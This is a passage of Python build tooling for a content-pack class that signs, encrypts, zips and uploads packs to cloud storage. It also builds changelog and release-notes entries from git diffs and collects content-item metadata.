release_notes (str): release notes md.
version_display_name (str): display name version.
build_number (srt): current build number.
pack_was_modified (bool): whether the pack was modified.
new_version (bool): whether the entry is new or not. If not new, R letter will be appended to build number.
initial_release (bool): whether the entry is an initial release or not.
Returns:
dict: release notes entry of changelog
"""
if new_version:
return {Changelog.RELEASE_NOTES: release_notes,
Changelog.DISPLAY_NAME: f'{version_display_name} - {build_number}',
Changelog.RELEASED: datetime.utcnow().strftime(Metadata.DATE_FORMAT)}
elif initial_release:
return {Changelog.RELEASE_NOTES: release_notes,
Changelog.DISPLAY_NAME: f'{version_display_name} - {build_number}',
Changelog.RELEASED: self._create_date}
elif pack_was_modified:
return {Changelog.RELEASE_NOTES: release_notes,
Changelog.DISPLAY_NAME: f'{version_display_name} - R{build_number}',
Changelog.RELEASED: datetime.utcnow().strftime(Metadata.DATE_FORMAT)}
return {}
def remove_unwanted_files(self, delete_test_playbooks=True):
""" Iterates over pack folder and removes hidden files and unwanted folders.
Args:
delete_test_playbooks (bool): whether to delete test playbooks folder.
Returns:
bool: whether the operation succeeded.
"""
task_status = True
try:
for directory in Pack.EXCLUDE_DIRECTORIES:
if delete_test_playbooks and os.path.isdir(f'{self._pack_path}/{directory}'):
shutil.rmtree(f'{self._pack_path}/{directory}')
logging.info(f"Deleted {directory} directory from {self._pack_name} pack")
for root, dirs, files in os.walk(self._pack_path, topdown=True):
for pack_file in files:
full_file_path = os.path.join(root, pack_file)
# removing unwanted files
if pack_file.startswith('.') \
or pack_file in [Pack.AUTHOR_IMAGE_NAME, Pack.USER_METADATA] \
or pack_file in self._remove_files_list:
os.remove(full_file_path)
logging.info(f"Deleted pack {pack_file} file for {self._pack_name} pack")
continue
except Exception:
task_status = False
logging.exception(f"Failed to delete ignored files for pack {self._pack_name}")
finally:
return task_status
def sign_pack(self, signature_string=None):
""" Signs pack folder and creates signature file.
Args:
signature_string (str): Base64 encoded string used to sign the pack.
Returns:
bool: whether the operation succeeded.
"""
task_status = False
try:
if signature_string:
with open("keyfile", "wb") as keyfile:
keyfile.write(signature_string.encode())
arg = f'./signDirectory {self._pack_path} keyfile base64'
signing_process = subprocess.Popen(arg, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
output, err = signing_process.communicate()
if err:
logging.error(f"Failed to sign pack for {self._pack_name} - {str(err)}")
return
logging.info(f"Signed {self._pack_name} pack successfully")
else:
logging.info(f"No signature provided. Skipped signing {self._pack_name} pack")
task_status = True
except Exception:
logging.exception(f"Failed to sign pack for {self._pack_name}")
finally:
return task_status
@staticmethod
def encrypt_pack(zip_pack_path, pack_name, encryption_key, extract_destination_path,
private_artifacts_dir, secondary_encryption_key):
""" decrypt the pack in order to see that the pack was encrypted in the first place.
Args:
zip_pack_path (str): The path to the encrypted zip pack.
pack_name (str): The name of the pack that should be encrypted.
encryption_key (str): The key which we can decrypt the pack with.
extract_destination_path (str): The path in which the pack resides.
private_artifacts_dir (str): The chosen name for the private artifacts directory.
secondary_encryption_key (str) : A second key which we can decrypt the pack with.
"""
try:
current_working_dir = os.getcwd()
shutil.copy('./encryptor', os.path.join(extract_destination_path, 'encryptor'))
os.chmod(os.path.join(extract_destination_path, 'encryptor'), stat.S_IXOTH)
os.chdir(extract_destination_path)
subprocess.call('chmod +x ./encryptor', shell=True)
output_file = zip_pack_path.replace("_not_encrypted.zip", ".zip")
full_command = f'./encryptor ./{pack_name}_not_encrypted.zip {output_file} "{encryption_key}"'
subprocess.call(full_command, shell=True)
secondary_encryption_key_output_file = zip_pack_path.replace("_not_encrypted.zip", ".enc2.zip")
full_command_with_secondary_encryption = f'./encryptor ./{pack_name}_not_encrypted.zip ' \
f'{secondary_encryption_key_output_file}' \
f' "{secondary_encryption_key}"'
subprocess.call(full_command_with_secondary_encryption, shell=True)
new_artefacts = os.path.join(current_working_dir, private_artifacts_dir)
if os.path.exists(new_artefacts):
shutil.rmtree(new_artefacts)
os.mkdir(path=new_artefacts)
shutil.copy(zip_pack_path, os.path.join(new_artefacts, f'{pack_name}_not_encrypted.zip'))
shutil.copy(output_file, os.path.join(new_artefacts, f'{pack_name}.zip'))
shutil.copy(secondary_encryption_key_output_file, os.path.join(new_artefacts, f'{pack_name}.enc2.zip'))
os.chdir(current_working_dir)
except (subprocess.CalledProcessError, shutil.Error) as error:
print(f"Error while trying to encrypt pack. {error}")
def decrypt_pack(self, encrypted_zip_pack_path, decryption_key):
""" decrypt the pack in order to see that the pack was encrypted in the first place.
Args:
encrypted_zip_pack_path (str): The path for the encrypted zip pack.
decryption_key (str): The key which we can decrypt the pack with.
Returns:
bool: whether the decryption succeeded.
"""
try:
current_working_dir = os.getcwd()
extract_destination_path = f'{current_working_dir}/decrypt_pack_dir'
os.mkdir(extract_destination_path)
shutil.copy('./decryptor', os.path.join(extract_destination_path, 'decryptor'))
secondary_encrypted_pack_path = os.path.join(extract_destination_path, 'encrypted_zip_pack.zip')
shutil.copy(encrypted_zip_pack_path, secondary_encrypted_pack_path)
os.chmod(os.path.join(extract_destination_path, 'decryptor'), stat.S_IXOTH)
output_decrypt_file_path = f"{extract_destination_path}/decrypt_pack.zip"
os.chdir(extract_destination_path)
subprocess.call('chmod +x ./decryptor', shell=True)
full_command = f'./decryptor {secondary_encrypted_pack_path} {output_decrypt_file_path} "{decryption_key}"'
process = subprocess.Popen(full_command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
stdout, stderr = process.communicate()
shutil.rmtree(extract_destination_path)
os.chdir(current_working_dir)
if stdout:
logging.info(str(stdout))
if stderr:
logging.error(f"Error: Premium pack {self._pack_name} should be encrypted, but isn't.")
return False
return True
except subprocess.CalledProcessError as error:
logging.exception(f"Error while trying to decrypt pack. {error}")
return False
def is_pack_encrypted(self, encrypted_zip_pack_path, decryption_key):
""" Checks if the pack is encrypted by trying to decrypt it.
Args:
encrypted_zip_pack_path (str): The path for the encrypted zip pack.
decryption_key (str): The key which we can decrypt the pack with.
Returns:
bool: whether the pack is encrypted.
"""
return self.decrypt_pack(encrypted_zip_pack_path, decryption_key)
def zip_pack(self, extract_destination_path="", pack_name="", encryption_key="",
private_artifacts_dir='private_artifacts', secondary_encryption_key=""):
""" Zips pack folder.
Returns:
bool: whether the operation succeeded.
str: full path to created pack zip.
"""
zip_pack_path = f"{self._pack_path}.zip" if not encryption_key else f"{self._pack_path}_not_encrypted.zip"
task_status = False
try:
with ZipFile(zip_pack_path, 'w', ZIP_DEFLATED) as pack_zip:
for root, dirs, files in os.walk(self._pack_path, topdown=True):
for f in files:
full_file_path = os.path.join(root, f)
relative_file_path = os.path.relpath(full_file_path, self._pack_path)
pack_zip.write(filename=full_file_path, arcname=relative_file_path)
if encryption_key:
self.encrypt_pack(zip_pack_path, pack_name, encryption_key, extract_destination_path,
private_artifacts_dir, secondary_encryption_key)
task_status = True
logging.success(f"Finished zipping {self._pack_name} pack.")
except Exception:
logging.exception(f"Failed in zipping {self._pack_name} folder")
finally:
# If the pack needs to be encrypted, it is initially at a different location than this final path
final_path_to_zipped_pack = f"{self._pack_path}.zip"
return task_status, final_path_to_zipped_pack
def detect_modified(self, content_repo, index_folder_path, current_commit_hash, previous_commit_hash):
""" Detects pack modified files.
The diff is done between current commit and previous commit that was saved in metadata that was downloaded from
index. In case that no commit was found in index (initial run), the default value will be set to previous commit
from origin/master.
Args:
content_repo (git.repo.base.Repo): content repo object.
index_folder_path (str): full path to downloaded index folder.
current_commit_hash (str): last commit hash of head.
previous_commit_hash (str): the previous commit to diff with.
Returns:
bool: whether the operation succeeded.
list: list of RN files that were modified.
bool: whether pack was modified and override will be required.
"""
task_status = False
modified_rn_files_paths = []
pack_was_modified = False
try:
pack_index_metadata_path = os.path.join(index_folder_path, self._pack_name, Pack.METADATA)
if not os.path.exists(pack_index_metadata_path):
logging.info(f"{self._pack_name} pack was not found in index, skipping detection of modified pack.")
task_status = True
return
with open(pack_index_metadata_path, 'r') as metadata_file:
downloaded_metadata = json.load(metadata_file)
previous_commit_hash = downloaded_metadata.get(Metadata.COMMIT, previous_commit_hash)
# set 2 commits by hash value in order to check the modified files of the diff
current_commit = content_repo.commit(current_commit_hash)
previous_commit = content_repo.commit(previous_commit_hash)
for modified_file in current_commit.diff(previous_commit):
if modified_file.a_path.startswith(PACKS_FOLDER):
modified_file_path_parts = os.path.normpath(modified_file.a_path).split(os.sep)
if modified_file_path_parts[1] and modified_file_path_parts[1] == self._pack_name:
if not is_ignored_pack_file(modified_file_path_parts):
logging.info(f"Detected modified files in {self._pack_name} pack")
task_status, pack_was_modified = True, True
modified_rn_files_paths.append(modified_file.a_path)
else:
logging.debug(f'{modified_file.a_path} is an ignored file')
task_status = True
if pack_was_modified:
# Make sure the modification is not only of release notes files, if so count that as not modified
pack_was_modified = not all(self.RELEASE_NOTES in path for path in modified_rn_files_paths)
# Filter modifications in release notes config JSON file - they will be handled later on.
modified_rn_files_paths = [path_ for path_ in modified_rn_files_paths if path_.endswith('.md')]
return
except Exception:
logging.exception(f"Failed in detecting modified files of {self._pack_name} pack")
finally:
return task_status, modified_rn_files_paths, pack_was_modified
def upload_to_storage(self, zip_pack_path, latest_version, storage_bucket, override_pack, storage_base_path,
private_content=False, pack_artifacts_path=None):
""" Manages the upload of pack zip artifact to correct path in cloud storage.
The zip pack will be uploaded to following path: /content/packs/pack_name/pack_latest_version.
In case that zip pack artifact already exist at constructed path, the upload will be skipped.
If flag override_pack is set to True, pack will forced for upload.
Args:
zip_pack_path (str): full path to pack zip artifact.
latest_version (str): pack latest version.
storage_bucket (google.cloud.storage.bucket.Bucket): google cloud storage bucket.
override_pack (bool): whether to override existing pack.
private_content (bool): Is being used in a private content build.
pack_artifacts_path (str): Path to where we are saving pack artifacts.
Returns:
bool: whether the operation succeeded.
bool: True in case of pack existence at targeted path and upload was skipped, otherwise returned False.
"""
task_status = True
try:
version_pack_path = os.path.join(storage_base_path, self._pack_name, latest_version)
existing_files = [f.name for f in storage_bucket.list_blobs(prefix=version_pack_path)]
if existing_files and not override_pack:
logging.warning(f"The following packs already exist at storage: {', '.join(existing_files)}")
logging.warning(f"Skipping step of uploading {self._pack_name}.zip to storage.")
return task_status, True, None
pack_full_path = os.path.join(version_pack_path, f"{self._pack_name}.zip")
blob = storage_bucket.blob(pack_full_path)
blob.cache_control = "no-cache,max-age=0" # disabling caching for pack blob
with open(zip_pack_path, "rb") as pack_zip:
blob.upload_from_file(pack_zip)
if private_content:
secondary_encryption_key_pack_name = f"{self._pack_name}.enc2.zip"
secondary_encryption_key_bucket_path = os.path.join(version_pack_path,
secondary_encryption_key_pack_name)
# In some cases the path given is actually a zip.
if pack_artifacts_path.endswith('content_packs.zip'):
_pack_artifacts_path = pack_artifacts_path.replace('/content_packs.zip', '')
else:
_pack_artifacts_path = pack_artifacts_path
secondary_encryption_key_artifacts_path = zip_pack_path.replace(f'{self._pack_name}',
f'{self._pack_name}.enc2')
blob = storage_bucket.blob(secondary_encryption_key_bucket_path)
blob.cache_control = "no-cache,max-age=0" # disabling caching for pack blob
with open(secondary_encryption_key_artifacts_path, "rb") as pack_zip:
blob.upload_from_file(pack_zip)
print(
f"Copying {secondary_encryption_key_artifacts_path} to {_pack_artifacts_path}/"
f"packs/{self._pack_name}.zip")
shutil.copy(secondary_encryption_key_artifacts_path,
f'{_pack_artifacts_path}/packs/{self._pack_name}.zip')
self.public_storage_path = blob.public_url
logging.success(f"Uploaded {self._pack_name} pack to {pack_full_path} path.")
return task_status, False, pack_full_path
except Exception:
task_status = False
logging.exception(f"Failed in uploading {self._pack_name} pack to gcs.")
return task_status, True, None
def copy_and_upload_to_storage(self, production_bucket, build_bucket, successful_packs_dict, storage_base_path,
build_bucket_base_path):
""" Manages the copy of pack zip artifact from the build bucket to the production bucket.
The zip pack will be copied to following path: /content/packs/pack_name/pack_latest_version if
the pack exists in the successful_packs_dict from Prepare content step in Create Instances job.
Args:
production_bucket (google.cloud.storage.bucket.Bucket): google cloud production bucket.
build_bucket (google.cloud.storage.bucket.Bucket): google cloud build bucket.
successful_packs_dict (dict): the dict of all packs were uploaded in prepare content step
storage_base_path (str): The target destination of the upload in the target bucket.
build_bucket_base_path (str): The path of the build bucket in gcp.
Returns:
bool: Status - whether the operation succeeded.
bool: Skipped pack - true in case of pack existence at the targeted path and the copy process was skipped,
otherwise returned False.
"""
pack_not_uploaded_in_prepare_content = self._pack_name not in successful_packs_dict
if pack_not_uploaded_in_prepare_content:
logging.warning("The following packs already exist at storage.")
logging.warning(f"Skipping step of uploading {self._pack_name}.zip to storage.")
return True, True
latest_version = successful_packs_dict[self._pack_name][BucketUploadFlow.LATEST_VERSION]
self._latest_version = latest_version
build_version_pack_path = os.path.join(build_bucket_base_path, self._pack_name, latest_version)
# Verifying that the latest version of the pack has been uploaded to the build bucket
existing_bucket_version_files = [f.name for f in build_bucket.list_blobs(prefix=build_version_pack_path)]
if not existing_bucket_version_files:
logging.error(f"{self._pack_name} latest version ({latest_version}) was not found on build bucket at "
f"path {build_version_pack_path}.")
return False, False
# We upload the pack zip object taken from the build bucket into the production bucket
prod_version_pack_path = os.path.join(storage_base_path, self._pack_name, latest_version)
prod_pack_zip_path = os.path.join(prod_version_pack_path, f'{self._pack_name}.zip')
build_pack_zip_path = os.path.join(build_version_pack_path, f'{self._pack_name}.zip')
build_pack_zip_blob = build_bucket.blob(build_pack_zip_path)
try:
copied_blob = build_bucket.copy_blob(
blob=build_pack_zip_blob, destination_bucket=production_bucket, new_name=prod_pack_zip_path
)
copied_blob.cache_control = "no-cache,max-age=0" # disabling caching for pack blob
self.public_storage_path = copied_blob.public_url
task_status = copied_blob.exists()
except Exception as e:
pack_suffix = os.path.join(self._pack_name, latest_version, f'{self._pack_name}.zip')
logging.exception(f"Failed copying {pack_suffix}. Additional Info: {str(e)}")
return False, False
if not task_status:
logging.error(f"Failed in uploading {self._pack_name} pack to production gcs.")
else:
# Determine if pack versions were aggregated during upload
pack_uploaded_in_prepare_content = not pack_not_uploaded_in_prepare_content
if pack_uploaded_in_prepare_content:
agg_str = successful_packs_dict[self._pack_name].get('aggregated')
if agg_str:
self._aggregated = True
self._aggregation_str = agg_str
logging.success(f"Uploaded {self._pack_name} pack to {prod_pack_zip_path} path.")
return task_status, False
def get_changelog_latest_rn(self, changelog_index_path: str) -> Tuple[dict, LooseVersion, str]:
"""
Returns the changelog file contents and the last version of rn in the changelog file
Args:
changelog_index_path (str): the changelog.json file path in the index
Returns: the changelog file contents, the last version, and contents of rn in the changelog file
"""
logging.info(f"Found Changelog for: {self._pack_name}")
if os.path.exists(changelog_index_path):
try:
with open(changelog_index_path, "r") as changelog_file:
changelog = json.load(changelog_file)
except json.JSONDecodeError:
changelog = {}
else:
changelog = {}
# get the latest rn version in the changelog.json file
changelog_rn_versions = [LooseVersion(ver) for ver in changelog]
# no need to check if changelog_rn_versions isn't empty because changelog file exists
changelog_latest_rn_version = max(changelog_rn_versions)
changelog_latest_rn = changelog[changelog_latest_rn_version.vstring]["releaseNotes"]
return changelog, changelog_latest_rn_version, changelog_latest_rn
def get_modified_release_notes_lines(self, release_notes_dir: str, new_release_notes_versions: list,
changelog: dict, modified_rn_files: list):
"""
In the case where an rn file was changed, this function returns the new content
of the release note in the format suitable for the changelog file.
In general, if two rn files are created between two consecutive upload runs (i.e. pack was changed twice),
the rn files are being aggregated and the latter version is the one that is being used as a key in the changelog
file, and the aggregated rns as the value.
Hence, in the case of changing an rn as such, this function re-aggregates all of the rns under the
corresponding version key, and returns the aggregated data, in the right format, as value under that key.
Args:
release_notes_dir (str): the path to the release notes dir
new_release_notes_versions (list): a list of the new versions of release notes in the pack since the
last upload. This means they were already handled on this upload run (and aggregated if needed).
changelog (dict): the changelog from the production bucket.
modified_rn_files (list): a list of the rn files that were modified according to the last commit in
'filename.md' format.
Returns:
A dict of modified version and their release notes contents, for modified
in the current index file
"""
modified_versions_dict = {}
for rn_filename in modified_rn_files:
version = underscore_file_name_to_dotted_version(rn_filename)
# Should only apply on modified files that are not the last rn file
if version in new_release_notes_versions:
continue
# The case where the version is a key in the changelog file,
# and the value is not an aggregated release note
if is_the_only_rn_in_block(release_notes_dir, version, changelog):
logging.info("The version is a key in the changelog file and by itself in the changelog block")
with open(os.path.join(release_notes_dir, rn_filename), 'r') as rn_file:
rn_lines = rn_file.read()
modified_versions_dict[version] = self._clean_release_notes(rn_lines).strip()
# The case where the version is not a key in the changelog file or it is a key of aggregated content
else:
logging.debug(f'The "{version}" version is not a key in the changelog file or it is a key of'
f' aggregated content')
same_block_versions_dict, higher_nearest_version = self.get_same_block_versions(
release_notes_dir, version, changelog)
modified_versions_dict[higher_nearest_version] = aggregate_release_notes_for_marketplace(
same_block_versions_dict)
return modified_versions_dict
def get_same_block_versions(self, release_notes_dir: str, version: str, changelog: dict):
"""
Get a dict of the version as key and rn data as value of all of the versions that are in the same
block in the changelog file as the given version (these are the versions that were aggregates together
during a single upload priorly).
Args:
release_notes_dir (str): the path to the release notes dir
version (str): the wanted version
changelog (dict): the changelog from the production bucket.
Returns:
A dict of version, rn data for all corresponding versions, and the highest version among those keys as str
"""
lowest_version = [LooseVersion(Pack.PACK_INITIAL_VERSION)]
lower_versions: list = []
higher_versions: list = []
same_block_versions_dict: dict = dict()
for item in changelog.keys(): # divide the versions into lists of lower and higher than given version
(lower_versions if LooseVersion(item) < version else higher_versions).append(LooseVersion(item))
higher_nearest_version = min(higher_versions)
lower_versions = lower_versions + lowest_version # if the version is 1.0.0, ensure lower_versions is not empty
lower_nearest_version = max(lower_versions)
for rn_filename in filter_dir_files_by_extension(release_notes_dir, '.md'):
current_version = underscore_file_name_to_dotted_version(rn_filename)
# Catch all versions that are in the same block
if lower_nearest_version < LooseVersion(current_version) <= higher_nearest_version:
with open(os.path.join(release_notes_dir, rn_filename), 'r') as rn_file:
rn_lines = rn_file.read()
same_block_versions_dict[current_version] = self._clean_release_notes(rn_lines).strip()
return same_block_versions_dict, higher_nearest_version.vstring
def get_release_notes_lines(self, release_notes_dir: str, changelog_latest_rn_version: LooseVersion,
changelog_latest_rn: str) -> Tuple[str, str, list]:
"""
Prepares the release notes contents for the new release notes entry
Args:
release_notes_dir (str): the path to the release notes dir
changelog_latest_rn_version (LooseVersion): the last version of release notes in the changelog.json file
changelog_latest_rn (str): the last release notes in the changelog.json file
Returns: The release notes contents, the latest release notes version (in the release notes directory),
and a list of the new rn versions that this is the first time they have been uploaded.
"""
found_versions: list = list()
pack_versions_dict: dict = dict()
for filename in sorted(filter_dir_files_by_extension(release_notes_dir, '.md')):
version = underscore_file_name_to_dotted_version(filename)
# Aggregate all rn files that are bigger than what we have in the changelog file
if LooseVersion(version) > changelog_latest_rn_version:
with open(os.path.join(release_notes_dir, filename), 'r') as rn_file:
rn_lines = rn_file.read()
pack_versions_dict[version] = self._clean_release_notes(rn_lines).strip()
found_versions.append(LooseVersion(version))
latest_release_notes_version = max(found_versions)
latest_release_notes_version_str = latest_release_notes_version.vstring
logging.info(f"Latest ReleaseNotes version is: {latest_release_notes_version_str}")
if len(pack_versions_dict) > 1:
# In case that there is more than 1 new release notes file, wrap all release notes together for one
# changelog entry
aggregation_str = f"[{', '.join(lv.vstring for lv in found_versions if lv > changelog_latest_rn_version)}]"\
f" => {latest_release_notes_version_str}"
logging.info(f"Aggregating ReleaseNotes versions: {aggregation_str}")
release_notes_lines = aggregate_release_notes_for_marketplace(pack_versions_dict)
self._aggregated = True
self._aggregation_str = aggregation_str
elif len(pack_versions_dict) == 1:
# In case where there is only one new release notes file
release_notes_lines = pack_versions_dict[latest_release_notes_version_str]
else:
# In case where the pack is up to date, i.e. latest changelog is latest rn file
# We should take the release notes from the index as it has might been aggregated
logging.info(f'No new RN file was detected for pack {self._pack_name}, taking latest RN from the index')
release_notes_lines = changelog_latest_rn
new_release_notes_versions = list(pack_versions_dict.keys())
return release_notes_lines, latest_release_notes_version_str, new_release_notes_versions
def assert_upload_bucket_version_matches_release_notes_version(self,
changelog: dict,
latest_release_notes: str) -> None:
"""
Sometimes there is a the current bucket is not merged from master there could be another version in the upload
bucket, that does not exist in the current branch.
This case can cause unpredicted behavior and we want to fail the build.
This method validates that this is not the case in the current build, and if it does - fails it with an
assertion error.
Args:
changelog: The changelog from the production bucket.
latest_release_notes: The latest release notes version string in the current branch
"""
changelog_latest_release_notes = max(changelog, key=lambda k: LooseVersion(k)) # pylint: disable=W0108
assert LooseVersion(latest_release_notes) >= LooseVersion(changelog_latest_release_notes), \
f'{self._pack_name}: Version mismatch detected between upload bucket and current branch\n' \
f'Upload bucket version: {changelog_latest_release_notes}\n' \
f'current branch version: {latest_release_notes}\n' \
'Please Merge from master and rebuild'
def get_rn_files_names(self, modified_rn_files_paths):
"""
Args:
modified_rn_files_paths: a list containing all modified files in the current pack, generated
by comparing the old and the new commit hash.
Returns:
The names of the modified release notes files out of the given list only,
as in the names of the files that are under ReleaseNotes directory in the format of 'filename.md'.
"""
modified_rn_files = []
for file_path in modified_rn_files_paths:
modified_file_path_parts = os.path.normpath(file_path).split(os.sep)
if self.RELEASE_NOTES in modified_file_path_parts:
modified_rn_files.append(modified_file_path_parts[-1])
return modified_rn_files
def prepare_release_notes(self, index_folder_path, build_number, pack_was_modified=False,
modified_rn_files_paths=None):
"""
Handles the creation and update of the changelog.json files.
Args:
index_folder_path (str): Path to the unzipped index json.
build_number (str): circleCI build number.
pack_was_modified (bool): whether the pack modified or not.
modified_rn_files_paths (list): list of paths of the pack's modified file
Returns:
bool: whether the operation succeeded.
bool: whether running build has not updated pack release notes.
"""
task_status = False
not_updated_build = False
release_notes_dir = os.path.join(self._pack_path, Pack.RELEASE_NOTES)
modified_rn_files_paths = modified_rn_files_paths if modified_rn_files_paths else []
try:
# load changelog from downloaded index
logging.info(f"Loading changelog for {self._pack_name} pack")
changelog_index_path = os.path.join(index_folder_path, self._pack_name, Pack.CHANGELOG_JSON)
if os.path.exists(changelog_index_path):
changelog, changelog_latest_rn_version, changelog_latest_rn = \
self.get_changelog_latest_rn(changelog_index_path)
if os.path.exists(release_notes_dir):
# Handling latest release notes files
release_notes_lines, latest_release_notes, new_release_notes_versions = \
self.get_release_notes_lines(
release_notes_dir, changelog_latest_rn_version, changelog_latest_rn)
self.assert_upload_bucket_version_matches_release_notes_version(changelog, latest_release_notes)
# Handling modified old release notes files, if there are any
rn_files_names = self.get_rn_files_names(modified_rn_files_paths)
modified_release_notes_lines_dict = self.get_modified_release_notes_lines(
release_notes_dir, new_release_notes_versions, changelog, rn_files_names)
if self._current_version != latest_release_notes:
logging.error(f"Version mismatch detected between current version: {self._current_version} "
f"and latest release notes version: {latest_release_notes}")
task_status = False
return task_status, not_updated_build
else:
if latest_release_notes in changelog:
logging.info(f"Found existing release notes for version: {latest_release_notes}")
version_changelog = self._create_changelog_entry(release_notes=release_notes_lines,
version_display_name=latest_release_notes,
build_number=build_number,
pack_was_modified=pack_was_modified,
new_version=False)
else:
logging.info(f"Created new release notes for version: {latest_release_notes}")
version_changelog = self._create_changelog_entry(release_notes=release_notes_lines,
version_display_name=latest_release_notes,
build_number=build_number,
new_version=True)
if version_changelog:
changelog[latest_release_notes] = version_changelog
if modified_release_notes_lines_dict:
logging.info("updating changelog entries for modified rn")
for version, modified_release_notes_lines in modified_release_notes_lines_dict.items():
updated_entry = self._get_updated_changelog_entry(
changelog, version, release_notes=modified_release_notes_lines)
changelog[version] = updated_entry
else: # will enter only on initial version and release notes folder still was not created
if len(changelog.keys()) > 1 or Pack.PACK_INITIAL_VERSION not in changelog:
logging.warning(
f"{self._pack_name} pack mismatch between {Pack.CHANGELOG_JSON} and {Pack.RELEASE_NOTES}")
task_status, not_updated_build = True, True
return task_status, not_updated_build
changelog[Pack.PACK_INITIAL_VERSION] = self._create_changelog_entry(
release_notes=self.description,
version_display_name=Pack.PACK_INITIAL_VERSION,
build_number=build_number,
initial_release=True,
new_version=False)
logging.info(f"Found existing release notes for version: {Pack.PACK_INITIAL_VERSION} "
f"in the {self._pack_name} pack.")
elif self._current_version == Pack.PACK_INITIAL_VERSION:
version_changelog = self._create_changelog_entry(
release_notes=self.description,
version_display_name=Pack.PACK_INITIAL_VERSION,
build_number=build_number,
new_version=True,
initial_release=True
)
changelog = {
Pack.PACK_INITIAL_VERSION: version_changelog
}
elif self._hidden:
logging.warning(f"Pack {self._pack_name} is deprecated. Skipping release notes handling.")
task_status = True
not_updated_build = True
return task_status, not_updated_build
else:
logging.error(f"No release notes found for: {self._pack_name}")
task_status = False
return task_status, not_updated_build
# Update change log entries with BC flag.
self.add_bc_entries_if_needed(release_notes_dir, changelog)
# write back changelog with changes to pack folder
with open(os.path.join(self._pack_path, Pack.CHANGELOG_JSON), "w") as pack_changelog:
json.dump(changelog, pack_changelog, indent=4)
task_status = True
logging.success(f"Finished creating {Pack.CHANGELOG_JSON} for {self._pack_name}")
except Exception as e:
logging.error(f"Failed creating {Pack.CHANGELOG_JSON} file for {self._pack_name}.\n "
f"Additional info: {e}")
finally:
return task_status, not_updated_build
def create_local_changelog(self, build_index_folder_path):
""" Copies the pack index changelog.json file to the pack path
Args:
build_index_folder_path: The path to the build index folder
Returns:
bool: whether the operation succeeded.
"""
task_status = True
build_changelog_index_path = os.path.join(build_index_folder_path, self._pack_name, Pack.CHANGELOG_JSON)
pack_changelog_path = os.path.join(self._pack_path, Pack.CHANGELOG_JSON)
if os.path.exists(build_changelog_index_path):
try:
shutil.copyfile(src=build_changelog_index_path, dst=pack_changelog_path)
logging.success(f"Successfully copied pack index changelog.json file from {build_changelog_index_path}"
f" to {pack_changelog_path}.")
except shutil.Error as e:
task_status = False
logging.error(f"Failed copying changelog.json file from {build_changelog_index_path} to "
f"{pack_changelog_path}. Additional info: {str(e)}")
return task_status
else:
task_status = False
logging.error(
f"{self._pack_name} index changelog file is missing in build bucket path: {build_changelog_index_path}")
return task_status and self.is_changelog_exists()
def collect_content_items(self):
""" Iterates over content items folders inside pack and collects content items data.
Returns:
dict: Parsed content items
.
"""
task_status = False
content_items_result: dict = {}
try:
# the format is defined in issue #19786, may change in the future
content_item_name_mapping = {
PackFolders.SCRIPTS.value: "automation",
PackFolders.PLAYBOOKS.value: "playbook",
PackFolders.INTEGRATIONS.value: "integration",
PackFolders.INCIDENT_FIELDS.value: "incidentfield",
PackFolders.INCIDENT_TYPES.value: "incidenttype",
PackFolders.DASHBOARDS.value: "dashboard",
PackFolders.INDICATOR_FIELDS.value: "indicatorfield",
PackFolders.REPORTS.value: "report",
PackFolders.INDICATOR_TYPES.value: "reputation",
PackFolders.LAYOUTS.value: "layoutscontainer",
PackFolders.CLASSIFIERS.value: "classifier",
PackFolders.WIDGETS.value: "widget",
PackFolders.GENERIC_DEFINITIONS.value: "genericdefinition",
PackFolders.GENERIC_FIELDS.value: "genericfield",
PackFolders.GENERIC_MODULES.value: "genericmodule",
PackFolders.GENERIC_TYPES.value: "generictype",
PackFolders.LISTS.value: "list",
PackFolders.PREPROCESS_RULES.value: "preprocessrule",
PackFolders.JOBS.value: "job",
}
for root, pack_dirs, pack_files_names in os.walk(self._pack_path, topdown=False):
current_directory = root.split(os.path.sep)[-1]
parent_directory = root.split(os.path.sep)[-2]
if parent_directory in [PackFolders.GENERIC_TYPES.value, PackFolders.GENERIC_FIELDS.value]:
current_directory = parent_directory
elif current_directory in [PackFolders.GENERIC_TYPES.value, PackFolders.GENERIC_FIELDS.value]:
continue
folder_collected_items = []
for pack_file_name in pack_files_names:
if not pack_file_name.endswith(('.json', '.yml')):
continue
pack_file_path = os.path.join(root, pack_file_name)
# reputation in old format aren't supported in 6.0.0 server version
if current_directory == PackFolders.INDICATOR_TYPES.value \
and not fnmatch.fnmatch(pack_file_name, 'reputation-*.json'):
os.remove(pack_file_path)
logging.info(f"Deleted pack {pack_file_name} reputation file for {self._pack_name} pack")
continue
with open(pack_file_path, 'r') as pack_file:
if current_directory in PackFolders.yml_supported_folders():
content_item = yaml.safe_load(pack_file)
elif current_directory in PackFolders.json_supported_folders():
content_item = json.load(pack_file)
else:
continue
# check if content item has to version
to_version = content_item.get('toversion') or content_item.get('toVersion')
if to_version and LooseVersion(to_version) < LooseVersion(Metadata.SERVER_DEFAULT_MIN_VERSION):
os.remove(pack_file_path)
logging.info(
f"{self._pack_name} pack content item {pack_file_name} has to version: {to_version}. "
f"{pack_file_name} file was deleted.")
continue
if current_directory not in PackFolders.pack_displayed_items():
continue # skip content items that are not displayed in contentItems
logging.debug(
f"Iterating over {pack_file_path} file and collecting items of {self._pack_name} pack")
# updated min server version from current content item
self._server_min_version = get_updated_server_version(self._server_min_version, content_item,
self._pack_name)
content_item_tags = content_item.get('tags', [])
if current_directory == PackFolders.SCRIPTS.value:
folder_collected_items.append({
'id': content_item.get('commonfields', {}).get('id', ''),
'name': content_item.get('name', ''),
'description': content_item.get('comment', ''),
'tags': content_item_tags,
})
if not self._contains_transformer and 'transformer' in content_item_tags:
self._contains_transformer = True
if not self._contains_filter and 'filter' in content_item_tags:
self._contains_filter = True
elif current_directory == PackFolders.PLAYBOOKS.value:
self.is_feed_pack(content_item, 'Playbook')
folder_collected_items.append({
'id': content_item.get('id', ''),
'name': content_item.get('name', ''),
'description': content_item.get('description', ''),
})
elif current_directory == PackFolders.INTEGRATIONS.value:
integration_commands = content_item.get('script', {}).get('commands', [])
self.is_feed_pack(content_item, 'Integration')
folder_collected_items.append({
'id': content_item.get('commonfields', {}).get('id', ''),
'name': content_item.get('display', ''),
'description': content_item.get('description', ''),
'category': content_item.get('category', ''),
'commands': [
{'name': c.get('name', ''), 'description': c.get('description', '')}
for c in integration_commands],
})
elif current_directory == PackFolders.INCIDENT_FIELDS.value:
folder_collected_items.append({
'id': content_item.get('id', ''),
'name': content_item.get('name', ''),
'type': content_item.get('type', ''),
